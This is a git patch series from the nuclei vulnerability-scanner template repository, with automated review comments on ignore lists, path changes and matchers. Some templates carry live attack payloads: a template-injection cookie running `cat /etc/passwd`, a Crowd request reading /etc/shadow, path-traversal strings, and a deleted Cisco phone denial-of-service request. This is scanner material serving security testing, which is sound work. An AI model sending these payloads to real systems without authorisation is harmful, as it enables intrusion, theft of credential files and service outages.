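Review bot: The home-assistant hunk leaves the two entries of the same `path` list in different forms: `{{BaseURL}}:8123/` keeps its trailing slash while the entry below it becomes `{{BaseURL}}`. If the point of the commit is a uniform root form for clustering, the first entry should read `- "{{BaseURL}}:8123"` as well; if the slash is deliberate on the port-qualified variant, a short comment on that line saying why would stop the next clean-up from removing it. The same change in cacti-detect, google-storage, kong-detect, linkerd-badrule-detect and mrtg-detect on this line is internally consistent and needs no further remark.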
--- a/technologies/prometheus-exporter-detect.yaml +++ b/technologies/prometheus-exporter-detect.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 6e7bd9c755..033288a3b9 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -6,7 +6,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" redirects: true max-redirects: 2 diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index cc1d3a4837..5c218db625 100644 --- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" matchers-condition: and From b528ce663c7c997aca9a08ddda164eb7cc73833d Mon Sep 17 00:00:00 2001 From: Michael Henriksen Date: Wed, 13 Jan 2021 12:45:44 +0100 Subject: [PATCH 62/85] Introduce a new risky-cves root folder The template for CVE-2020-16139 lived in `cves/` and was not ignored by default in .nuclei-ignore for a considerable time because of directory restructuring. The risky-cves root folder is introduced to make this mistake less likely to happen in the future. --- .nuclei-ignore | 2 +- {cves => risky-cves}/2020/CVE-2020-16139.yaml | 0 2 files changed, 1 insertion(+), 1 deletion(-) rename {cves => risky-cves}/2020/CVE-2020-16139.yaml (100%) diff --git a/.nuclei-ignore b/.nuclei-ignore index 2de13a9905..75fbf99c2f 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore 
@@ -15,7 +15,7 @@ cves/CVE-2017-7529.yaml cves/CVE-2020-13379.yaml cves/CVE-2013-2251.yaml -cves/CVE-2020-16139.yaml +risky-cves/ vulnerabilities/x-forwarded-host-injection.yaml # Fuzzing is excluded to avoid running bruteforce on every server as default. diff --git a/cves/2020/CVE-2020-16139.yaml b/risky-cves/2020/CVE-2020-16139.yaml similarity index 100% rename from cves/2020/CVE-2020-16139.yaml rename to risky-cves/2020/CVE-2020-16139.yaml From 6ca9591c99f00aac7357047fcf585d983c7c345a Mon Sep 17 00:00:00 2001 From: Michael Henriksen Date: Wed, 13 Jan 2021 12:49:03 +0100 Subject: [PATCH 63/85] Remove .nuclei-ignore references to non-existent templates --- .nuclei-ignore | 2 -- 1 file changed, 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 75fbf99c2f..f1949f8ba6 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -12,8 +12,6 @@ # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion .pre-commit-config.yaml -cves/CVE-2017-7529.yaml -cves/CVE-2020-13379.yaml cves/CVE-2013-2251.yaml risky-cves/ vulnerabilities/x-forwarded-host-injection.yaml From 8352228bc68b4e99c94ca20839533a9e2339d6ab Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Wed, 13 Jan 2021 17:54:27 +0530 Subject: [PATCH 64/85] adding to avoid older structured folders. --- .nuclei-ignore | 22 ++++++++++++++++------ 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 2de13a9905..d7c47164c6 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore 
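Review bot: The new `risky-cves/` entry is the only thing keeping a denial-of-service template out of default runs, yet unlike the `fuzzing/` block further down it carries no comment saying why the directory is excluded or what belongs in it; add one above it, e.g. `# Templates under risky-cves/ can disrupt or crash the target service and are never part of a default run.` The per-file entries around it (`cves/CVE-2017-7529.yaml`, `cves/CVE-2020-13379.yaml`, `cves/CVE-2013-2251.yaml`) still use the flat `cves/<id>` form although the rename in this very commit shows templates living under `cves/<year>/`, so they most likely no longer match anything — the exact failure mode the commit message describes. A directory-level rule is more robust to moves, which is the stance this change takes for CVE-2020-16139, so the remaining per-file entries deserve the same treatment or at least corrected paths.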
@@ -12,11 +12,10 @@ # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion .pre-commit-config.yaml -cves/CVE-2017-7529.yaml -cves/CVE-2020-13379.yaml -cves/CVE-2013-2251.yaml -cves/CVE-2020-16139.yaml -vulnerabilities/x-forwarded-host-injection.yaml +cves/2013/CVE-2013-2251.yaml +cves/2017/CVE-2017-7529.yaml +cves/2020/CVE-2020-13379.yaml +cves/2020/CVE-2020-16139.yaml # Fuzzing is excluded to avoid running bruteforce on every server as default. fuzzing/ @@ -26,4 +25,15 @@ helpers/ miscellaneous/ # Workflows are excluded from default run to avoid duplicate scans. -workflows/ \ No newline at end of file +workflows/ + +# Adding older folder to avoid possilbe issue with nuclei ignore execution. +misc/ +default-credentials/ +files/ +generic-detections/ +panels/ +payloads/ +security-misconfiguration/ +subdomain-takeover/ +tokens/ \ No newline at end of file From b5b9eeb6bd778fce911004d93187c5c9153ceec0 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Wed, 13 Jan 2021 18:11:48 +0530 Subject: [PATCH 65/85] Removing CVE-2020-16139 temporarily --- .nuclei-ignore | 20 ++++++++++++++++---- risky-cves/2020/CVE-2020-16139.yaml | 28 ---------------------------- 2 files changed, 16 insertions(+), 32 deletions(-) delete mode 100644 risky-cves/2020/CVE-2020-16139.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index f1949f8ba6..36a904978c 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -12,9 +12,10 @@ # More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion .pre-commit-config.yaml -cves/CVE-2013-2251.yaml -risky-cves/ -vulnerabilities/x-forwarded-host-injection.yaml +cves/2013/CVE-2013-2251.yaml +cves/2017/CVE-2017-7529.yaml +cves/2020/CVE-2020-13379.yaml +cves/2020/CVE-2020-16139.yaml # Fuzzing is excluded to avoid running bruteforce on every server as default. fuzzing/ 
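Review bot: The first hunk drops `vulnerabilities/x-forwarded-host-injection.yaml` from the default-exclusion list although the commit message only talks about older folder names; nothing in the diff replaces that entry, so if the template still exists it now runs by default on every target. If it was renamed or removed, say so in the message; otherwise re-add the entry under its current path. The comment introduced in the second hunk has a typo and reads better as `# Older folder names are listed to avoid possible issues with nuclei-ignore handling.`, and the file again ends without a trailing newline (`\ No newline at end of file` on `tokens/`), which the commits in this series keep flipping back and forth — an end-of-file pre-commit hook would settle it.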
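Review bot: The entry `cves/2020/CVE-2020-16139.yaml` added in this hunk points at a path that no longer exists: the previous commit moved the template to `risky-cves/`, and this same commit deletes it from there (the deletion hunk is on the next line), so the ignore list now names a file that is in neither location while the `risky-cves/` directory rule it replaces is gone. Stale per-file entries are exactly what the earlier commit in this series set out to avoid; either keep `risky-cves/` as a standing rule for when the template is restored, or drop the per-file line so the exclusion list reflects the tree.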
@@ -24,4 +25,15 @@ helpers/ miscellaneous/ # Workflows are excluded from default run to avoid duplicate scans. -workflows/ \ No newline at end of file +workflows/ + +# Adding older folder to avoid possilbe issue with nuclei ignore execution. +misc/ +default-credentials/ +files/ +generic-detections/ +panels/ +payloads/ +security-misconfiguration/ +subdomain-takeover/ +tokens/ diff --git a/risky-cves/2020/CVE-2020-16139.yaml b/risky-cves/2020/CVE-2020-16139.yaml deleted file mode 100644 index b8521bd8f1..0000000000 --- a/risky-cves/2020/CVE-2020-16139.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-16139 - -info: - name: Cisco 7937G Denial-of-Service Reboot Attack - author: pikpikcu - severity: low - -# Refrence:-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/ - -requests: - - raw: - - | - POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "application/xml" - - type: word - words: - - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' From 3cb3ac6bcb18c0587803daffa8e77419276f1461 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Wed, 13 Jan 2021 18:13:00 +0530 Subject: [PATCH 66/85] Update .nuclei-ignore --- .nuclei-ignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 36a904978c..d7c47164c6 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -36,4 +36,4 @@ panels/ payloads/ security-misconfiguration/ subdomain-takeover/ -tokens/ +tokens/ \ No newline at end of file From 4fd46aabd3e4c897a0e7bd09ae9e044afbdff28d Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Wed, 13 Jan 2021 12:49:25 +0000 Subject: [PATCH 67/85] Auto Update README [Wed Jan 13 12:49:25 UTC 2021] :robot: --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 580eeeaad4..764f29b941 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 155 | default-logins | 8 | +| cves | 154 | default-logins | 8 | | dns | 6 | exposed-panels | 72 | | exposed-tokens | 9 | exposures | 40 | | fuzzing | 5 | helpers | 3 | @@ -164,7 +164,6 @@ An overview of the nuclei template directory including number of templates assoc │   ├── CVE-2020-15129.yaml │   ├── CVE-2020-15505.yaml │   ├── CVE-2020-15920.yaml -│   ├── CVE-2020-16139.yaml │   ├── CVE-2020-16846.yaml │   ├── CVE-2020-16952.yaml │   ├── CVE-2020-17505.yaml @@ -575,7 +574,7 @@ An overview of the nuclei template directory including number of templates assoc
-**53 directories, 475 files**. +**53 directories, 474 files**. 📖 Documentation ----- From 066e3813be19040d6faf01c3e67aa524051e6756 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 13 Jan 2021 17:28:48 -0600 Subject: [PATCH 68/85] Update and rename public-tomcat-instance.yaml to public-tomcat-manager.yaml Updating the name to better reflect what we're looking for. Updating the status matcher since some Tomcat manager instances don't require auth. --- ...blic-tomcat-instance.yaml => public-tomcat-manager.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename exposed-panels/{public-tomcat-instance.yaml => public-tomcat-manager.yaml} (77%) diff --git a/exposed-panels/public-tomcat-instance.yaml b/exposed-panels/public-tomcat-manager.yaml similarity index 77% rename from exposed-panels/public-tomcat-instance.yaml rename to exposed-panels/public-tomcat-manager.yaml index e1c2ec79b6..3989655c1f 100644 --- a/exposed-panels/public-tomcat-instance.yaml +++ b/exposed-panels/public-tomcat-manager.yaml @@ -1,8 +1,8 @@ -id: public-tomcat-instance +id: public-tomcat-manager info: name: tomcat manager disclosure - author: Ahmed Sherif + author: Ahmed Sherif & geeknik severity: info requests: @@ -18,3 +18,5 @@ requests: - type: status status: - 401 + - 200 + condition: or From e39a230a189938380119197f81eabbd79dec1ff1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Jan 2021 06:00:54 +0000 Subject: [PATCH 69/85] Auto Update README [Thu Jan 14 06:00:54 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 764f29b941..527b6c8331 100644 --- a/README.md +++ b/README.md 
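Review bot: Accepting `200` beside `401` in the status matcher folds two very different findings into one result: a 401 means the manager is reachable but guarded by authentication, a 200 means the manager page itself came back without credentials, which is a far more serious exposure than the unchanged `severity: info` conveys. Consider two named matchers — e.g. `name: tomcat-manager-auth-required` for 401 and `name: tomcat-manager-unauthenticated` for 200 — so the output says which case fired, or at least record the distinction in `description`; the word matcher that guards the body is outside this hunk, so I cannot tell how tightly a 200 is otherwise constrained. Also, as far as I recall nuclei's status matcher succeeds when any listed code equals the response status regardless of `condition`, so `condition: or` may be redundant here — worth confirming against the engine version this repository targets.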
@@ -277,7 +277,7 @@ An overview of the nuclei template directory including number of templates assoc │   ├── parallels-html-client.yaml │   ├── phpmyadmin-panel.yaml │   ├── polycom-admin-detect.yaml -│   ├── public-tomcat-instance.yaml +│   ├── public-tomcat-manager.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml │   ├── rocketmq-console-exposure.yaml From 9234a6801f6bd727faa61225fdc2eb58f6c48bf4 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Thu, 14 Jan 2021 12:27:13 +0530 Subject: [PATCH 70/85] moving files around --- {technologies => exposed-panels}/prometheus-exporter-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {technologies => exposed-panels}/prometheus-exporter-detect.yaml (100%) diff --git a/technologies/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml similarity index 100% rename from technologies/prometheus-exporter-detect.yaml rename to exposed-panels/prometheus-exporter-detect.yaml From 29c1b3422dbeab762f1419a3d8141969395e23a4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Jan 2021 06:57:45 +0000 Subject: [PATCH 71/85] Auto Update README [Thu Jan 14 06:57:45 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 527b6c8331..b5e88d0105 100644 --- a/README.md +++ b/README.md 
@@ -29,11 +29,11 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 154 | default-logins | 8 | -| dns | 6 | exposed-panels | 72 | +| dns | 6 | exposed-panels | 73 | | exposed-tokens | 9 | exposures | 40 | | fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | -| takeovers | 1 | technologies | 44 | +| takeovers | 1 | technologies | 43 | | vulnerabilities | 62 | workflows | 17 | @@ -277,6 +277,7 @@ An overview of the nuclei template directory including number of templates assoc │   ├── parallels-html-client.yaml │   ├── phpmyadmin-panel.yaml │   ├── polycom-admin-detect.yaml +│   ├── prometheus-exporter-detect.yaml │   ├── public-tomcat-manager.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml @@ -460,7 +461,6 @@ An overview of the nuclei template directory including number of templates assoc │   ├── nifi-detech.yaml │   ├── oidc-detect.yaml │   ├── pi-hole-detect.yaml -│   ├── prometheus-exporter-detect.yaml │   ├── prometheus-exposed-panel.yaml │   ├── prtg-detect.yaml │   ├── redmine-cli-detect.yaml From 631a135ea5fbae2f1d9edf1b098822b071b44c4d Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Thu, 14 Jan 2021 19:40:22 +0530 Subject: [PATCH 72/85] Delete basic-auth-workflow.yaml --- workflows/basic-auth-workflow.yaml | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 workflows/basic-auth-workflow.yaml diff --git a/workflows/basic-auth-workflow.yaml b/workflows/basic-auth-workflow.yaml deleted file mode 100644 index 3afd5b440b..0000000000 --- a/workflows/basic-auth-workflow.yaml +++ /dev/null 
@@ -1,16 +0,0 @@ -id: basic-auth-workflow - -info: - name: Basic auth Security Checks - author: w4cky_ - description: A simple workflow that runs all Basic auth related nuclei templates on a given target. - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. - -workflows: - - - template: technologies/basic-auth-detection.yaml - - subtemplates: - - template: fuzzing/basic-auth-bruteforce.yaml \ No newline at end of file From f8114097a2706eb86b0ecb76c2e9d8c99bfbddbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 14 Jan 2021 14:11:28 +0000 Subject: [PATCH 73/85] Auto Update README [Thu Jan 14 14:11:28 UTC 2021] :robot: --- README.md | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index b5e88d0105..662023612c 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ An overview of the nuclei template directory including number of templates assoc | fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | | takeovers | 1 | technologies | 43 | -| vulnerabilities | 62 | workflows | 17 | +| vulnerabilities | 62 | workflows | 16 | **Tree structure of nuclei templates:** @@ -554,7 +554,6 @@ An overview of the nuclei template directory including number of templates assoc │   └── wordpress-wpcourses-info-disclosure.yaml └── workflows ├── artica-web-proxy-workflow.yaml - ├── basic-auth-workflow.yaml ├── bigip-workflow.yaml ├── cisco-asa-workflow.yaml ├── grafana-workflow.yaml @@ -574,7 +573,7 @@ An overview of the nuclei template directory including number of templates assoc
-**53 directories, 474 files**. +**53 directories, 473 files**. 📖 Documentation ----- From dc2459593515aa2dbc71abce1dfc768b408a6abb Mon Sep 17 00:00:00 2001 
From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Thu, 14 Jan 2021 20:11:56 +0530 Subject: [PATCH 74/85] BaseURL updates --- cves/2018/CVE-2018-1000129.yaml | 1 - cves/2019/CVE-2019-11580.yaml | 1 - cves/2019/CVE-2019-2588.yaml | 1 - cves/2019/CVE-2019-2725.yaml | 1 - cves/2019/CVE-2019-7609.yaml | 1 - cves/2020/CVE-2020-13942.yaml | 1 - cves/2020/CVE-2020-15129.yaml | 1 - cves/2020/CVE-2020-16846.yaml | 1 - cves/2020/CVE-2020-2551.yaml | 1 - cves/2020/CVE-2020-5410.yaml | 5 ++--- cves/2020/CVE-2020-8512.yaml | 1 - cves/2020/CVE-2020-9484.yaml | 1 - default-logins/rabbitmq/rabbitmq-default-admin.yaml | 1 - default-logins/solarwinds/solarwinds-default-admin.yaml | 2 +- exposed-panels/activemq-panel.yaml | 3 ++- exposed-panels/airflow-exposure.yaml | 2 +- exposed-panels/ambari-exposure.yaml | 3 ++- exposed-panels/ansible-tower-exposure.yaml | 3 ++- exposed-panels/couchdb-fauxton.yaml | 3 ++- exposed-panels/druid-console-exposure.yaml | 3 ++- exposed-panels/flink-exposure.yaml | 3 ++- exposed-panels/kafka-connect-ui.yaml | 3 ++- exposed-panels/kafka-monitoring.yaml | 3 ++- exposed-panels/kafka-topics-ui.yaml | 3 ++- exposed-panels/public-tomcat-manager.yaml | 2 +- exposed-panels/rabbitmq-dashboard.yaml | 1 - exposed-panels/rocketmq-console-exposure.yaml | 3 ++- exposed-panels/sap-hana-xsengine-panel.yaml | 1 - exposed-panels/traefik-dashboard.yaml | 1 - exposures/logs/struts-debug-mode.yaml | 3 ++- misconfiguration/aws-redirect.yaml | 3 ++- misconfiguration/django-debug-detect.yaml | 6 ------ misconfiguration/elasticsearch.yaml | 2 -- misconfiguration/exposed-kibana.yaml | 4 +--- misconfiguration/kubernetes-pods.yaml | 1 - misconfiguration/manage-engine-ad-search.yaml | 2 -- misconfiguration/springboot-detect.yaml | 2 -- misconfiguration/symfony-debugmode.yaml | 2 +- misconfiguration/unauthenticated-airflow.yaml | 5 ----- technologies/home-assistant.yaml | 1 - technologies/jolokia.yaml | 1 - technologies/liferay-portal-detect.yaml | 2 -- 
technologies/prometheus-exposed-panel.yaml | 1 - technologies/weblogic-detect.yaml | 1 - .../springboot/springboot-actuators-jolokia-xxe.yaml | 1 - 45 files changed, 31 insertions(+), 62 deletions(-) diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml index 23c704d5d5..ed087afe5c 100644 --- a/cves/2018/CVE-2018-1000129.yaml +++ b/cves/2018/CVE-2018-1000129.yaml @@ -11,7 +11,6 @@ requests: path: - "{{BaseURL}}/jolokia/read?mimeType=text/html" - "{{BaseURL}}/api/jolokia/read?mimeType=text/html" - - "{{BaseURL}}:8080/jolokia/read?mimeType=text/html" matchers-condition: and matchers: - type: status diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml index eea2e6b10c..cbdd4f1b13 100644 --- a/cves/2019/CVE-2019-11580.yaml +++ b/cves/2019/CVE-2019-11580.yaml @@ -24,7 +24,6 @@ requests: - method: GET path: - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow" - - "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow" matchers-condition: and matchers: - type: word diff --git a/cves/2019/CVE-2019-2588.yaml b/cves/2019/CVE-2019-2588.yaml index 9fec707594..d598c438d3 100644 --- a/cves/2019/CVE-2019-2588.yaml +++ b/cves/2019/CVE-2019-2588.yaml @@ -9,7 +9,6 @@ requests: - method: GET path: - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" - - "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" matchers-condition: and matchers: - type: word diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml index b983eb215a..41a96b44e5 100644 --- a/cves/2019/CVE-2019-2725.yaml +++ b/cves/2019/CVE-2019-2725.yaml 
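Review bot: Removing the explicit-port path variants (`{{BaseURL}}:8080/jolokia/...` here, `:8095` in CVE-2019-11580, `:9502` in CVE-2019-2588, and `:7001` in CVE-2019-2725 on the next line) drops detection coverage for services listening on their default non-HTTP ports unless the scan input already enumerates those ports, and the commit title `BaseURL updates` gives no hint which is intended. If the repository's new convention is that templates never hard-code ports and users are expected to feed port-qualified URLs, state that in the commit message or a contributing note so reviewers do not re-add them; otherwise the `:port` entries should stay. The same question applies to the remaining files in this commit's diffstat whose hunks are outside this view.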
@@ -18,7 +18,6 @@ requests: - method: POST path: - "{{BaseURL}}/_async/AsyncResponseService" - - "{{BaseURL}}:7001/_async/AsyncResponseService" body: >- Date: Thu, 14 Jan 2021 20:21:36 +0530 Subject: [PATCH 75/85] Update CVE-2020-5410.yaml --- cves/2020/CVE-2020-5410.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index 25452f8fcc..75acfbbe97 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml @@ -9,7 +9,7 @@ requests: - method: GET path: - "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development" -\ matchers-condition: and + matchers-condition: and matchers: - type: status status: From 0c237549fed1e9aea2a7ee32804d9be9ecf3def7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tommy=20M=C3=BChle?= Date: Fri, 15 Jan 2021 10:29:10 +0100 Subject: [PATCH 76/85] Add further path to composer-config.yaml If the vendor directory is part of the web root you can also find the config in the provided path. Of course you've then also some more problems besides that ;) --- exposures/configs/composer-config.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml index b3a9afeebb..8fe5d67e0a 100644 --- a/exposures/configs/composer-config.yaml +++ b/exposures/configs/composer-config.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/composer.json" - "{{BaseURL}}/composer.lock" - "{{BaseURL}}/.composer/composer.json" + - "{{BaseURL}}/vendor/composer/installed.json" matchers: - type: dsl @@ -21,4 +22,4 @@ requests: - type: dsl name: composer.json dsl: - - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200" \ No newline at end of file + - "contains(body, 'require') == true && contains(tolower(all_headers), 'application/json') == true && status_code == 200" 
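Review bot: The newly listed `/vendor/composer/installed.json` path is evaluated by the same DSL matchers as the three existing paths, so a hit on it is reported under an existing matcher name (`composer.json` for the matcher visible in the second hunk; the first matcher's name lies outside the hunk), which mislabels the finding and hides which file was actually exposed. A dedicated `- type: dsl` matcher with `name: installed.json` keyed on that file would keep report names accurate; at minimum the template `description` should state that the vendor manifest is also covered. The trailing-newline fix in the second hunk is fine as is.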
From f7b9ae5148e0082a150fe9402ee949ae1297f4a4 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+bauthard@users.noreply.github.com> Date: Fri, 15 Jan 2021 21:00:35 +0530 Subject: [PATCH 77/85] updating exclude list --- .nuclei-ignore | 13 +------------ 1 file changed, 1 insertion(+), 12 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index d7c47164c6..1f30f3f2cc 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -25,15 +25,4 @@ helpers/ miscellaneous/ # Workflows are excluded from default run to avoid duplicate scans. -workflows/ - -# Adding older folder to avoid possilbe issue with nuclei ignore execution. -misc/ -default-credentials/ -files/ -generic-detections/ -panels/ -payloads/ -security-misconfiguration/ -subdomain-takeover/ -tokens/ \ No newline at end of file +workflows/ \ No newline at end of file From 642480ecb813396e73a3109889362a2c15e82e7b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 16 Jan 2021 15:02:41 +0000 Subject: [PATCH 78/85] Create lucee-detect.yaml --- technologies/lucee-detect.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/lucee-detect.yaml diff --git a/technologies/lucee-detect.yaml b/technologies/lucee-detect.yaml new file mode 100644 index 0000000000..5213f4acd0 --- /dev/null +++ b/technologies/lucee-detect.yaml @@ -0,0 +1,22 @@ +id: lucee-detect +info: + name: Detect Lucee + author: geeknik + description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "(?i)X-Lucee-Version" + - "(?i)X-CB-Server: LUCEE" + - "(?i)X-IDG-Appserver: Lucee" + condition: or From 1a6c4e7f33938718905bbb5403e3be5d7d59cd0a Mon Sep 17 00:00:00 2001 
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 16 Jan 2021 15:25:15 +0000 Subject: [PATCH 79/85] Update lucee-detect.yaml --- technologies/lucee-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/lucee-detect.yaml b/technologies/lucee-detect.yaml index 5213f4acd0..e4cd2663f7 100644 --- a/technologies/lucee-detect.yaml +++ b/technologies/lucee-detect.yaml @@ -10,7 +10,6 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: regex From 4b13b7a485178d741aa08b105dc537051c4989bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 16 Jan 2021 15:29:01 +0000 Subject: [PATCH 80/85] Auto Update README [Sat Jan 16 15:29:01 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 662023612c..4ce6d72fc7 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | exposures | 40 | | fuzzing | 5 | helpers | 3 | | miscellaneous | 14 | misconfiguration | 37 | -| takeovers | 1 | technologies | 43 | +| takeovers | 1 | technologies | 44 | | vulnerabilities | 62 | workflows | 16 | @@ -455,6 +455,7 @@ An overview of the nuclei template directory including number of templates assoc │   ├── liferay-portal-detect.yaml │   ├── linkerd-badrule-detect.yaml │   ├── lotus-domino-version.yaml +│   ├── lucee-detect.yaml │   ├── magmi-detect.yaml │   ├── mrtg-detect.yaml │   ├── netsweeper-webadmin-detect.yaml @@ -573,7 +574,7 @@ An overview of the nuclei template directory including number of templates assoc -**53 directories, 473 files**. +**53 directories, 474 files**. 📖 Documentation ----- From 58ebf5903535a822ff9c29b2459573478e420331 Mon Sep 17 00:00:00 2001 
